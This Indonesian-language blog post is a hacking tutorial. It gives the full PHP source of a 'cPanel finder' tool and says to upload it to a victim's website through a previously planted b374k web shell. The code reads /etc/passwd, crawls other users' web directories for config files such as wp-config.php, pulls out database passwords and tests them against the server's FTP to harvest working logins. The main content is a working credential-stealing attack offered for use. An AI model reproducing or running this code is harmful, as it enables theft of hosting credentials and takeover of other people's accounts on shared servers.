How to get cPanel using cPanel finder !!!

Yoo semuanya dah lama neh ngak ngepost, maklum anak sekolahan banyak tugas, wkwkwkwkwk. Oke all pada postingan ane kali ini ane akan menshare cara untuk mendapatkan cPanel atau WHM menggunakan shell. Langsung aja ya to the point,  siapkan alat – alat perangnya🙂

Neh alat perang yang akan kamu butuhkan nanti :

1.Shell (disini ane pake b374k mini << cinta produk lokal wkwkwkwk🙂 )

2.Cpanel finder (buatan eidelweiss anak ycl), neh scriptnya :


<?php
/*
eidelweiss
Edited by eidelweiss
Thank`s To: v3n0m (yg bantu ngasih nama or judul), AL-MARHUM, syabilla_putri (my Lovely Wife), YOGYACARDERLINK CREW
(c) http://yogyacarderlink.web.id
*/
echo '<html><head><title>Cpanel finder</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
 $str = fgets($passwd);
 if ($i > 35)
 {
 $pos = strpos($str,':');
 $username = substr($str,0,$pos);
 $dirz = '/home/'.$username.'/public_html/';
 if (($username != '))
 {
 if (is_readable($dirz))
 {
 array_push($users,$username);
 array_push($pub,$dirz);
 }
 }
 }
 $i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
 $path = "/home/$user/public_html/";
 read_dir($path,$user);
}
echo "\n[+] Finished\n";
function read_dir($path,$username)
{
 if ($handle = opendir($path))
 {
 while (false !== ($file = readdir($handle)))
 {
 $fpath = "$path$file";
 if (($file != '.') and ($file != '..'))
 {
 if (is_readable($fpath))
 {
 $dr = $fpath."/";
 if (is_dir($dr))
 {
 read_dir($dr,$username);
 }
 else
 {
 if (
 ($file=='config.php')
 or ($file=='config.inc.php')
 or ($file=='conf.php')
 or ($file=='settings.php')
 or ($file=='configuration.php')
 or ($file=='wp_config.php')
 or ($file=='wp-config.php')
 or ($file=='inc.php')
 or ($file=='setup.php')
 or ($file=='dbconf.php')
 or ($file=='dbconfig.php')
 or ($file=='db.inc.php')
 or ($file=='dbconnect.php')
 or ($file=='connect.php')
 or ($file=='configure.php')
 or ($file=='config_global.php')
 or ($file=='db.php')
 or ($file=='connect.inc.php')
 or ($file=='dbconnect.inc.php'))
 {
 $pass = get_pass($fpath);
 if ($pass != ')
 {
 echo "[+] $fpath\n$pass\n";
 ftp_check($username,$pass);
 }
 }
 }
 }
 }
 }
 }
}
function get_pass($link)
{
 @$config = fopen($link,'r');
 while(!feof($config))
 {
 $line = fgets($config);
 if (strstr($line,'pass')
 or strstr($line,'pwd')
 or strstr($line,'db_pass')
 or strstr($line,'dbpass')
 or strstr($line,'passwd'))
 {
 if (strrpos($line,'"'))
 {
 preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
 $pass = str_replace("]=\"","",$pass);
 }

 else
 preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
 $pass = str_replace("]='","",$pass);
 return $pass[2];
 }
 }
}
function ftp_check($login,$pass)
{
 @$ftp = ftp_connect('127.0.0.1');
 if ($ftp)
 {
 @$res = ftp_login($ftp,$login,$pass);
 if ($res)
 {
 echo '[FTP] '.$login.':'.$pass."  Success !\n";
 }
 else ftp_quit($ftp);
 }
}
echo '</textarea><br><br>Coded by <b>eidelweiss</b> & <b>yogyacarderlink</b>  <a href=http://yogyacarderlink.web.id</a></body></html>';
?>

Kalau alat perangnya udah beres langsung aja kita exploit, dengan step sebagai berikut :

1.Upload cpanel findernya ke web target melalui shell

2. Kalau udah diupload langsung aja dijalankan cpanel findernya.

Ntar kalau dapat cpanel ada tulisan “[FTP] username:password  Success !

Selamat mencoba gan🙂 and semoga sukses😀

3 comments on “How to get cPanel using cPanel finder !!!

  1. waduh….tuts nya cepet bgt kya kilat….kl nubi ky ane mah cuma bsa baca tanpa ngerti step2nya…misalnya ane ga paham masalah gmn cara ngedapetin shell b374k,cra pake nya gimana,,,trus gmana cara uploadnya,trus cara ngexploitnya gmana?
    Maaf bgt kk ane guoblog dalam hal ini,tp ane slalu brjuang untuk ga guoblog dalam hal ini,,,mohon pencerahannya

  2. Pingback: Membuat Base64 Encoder / Decoder Sederhana « sayaaje

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s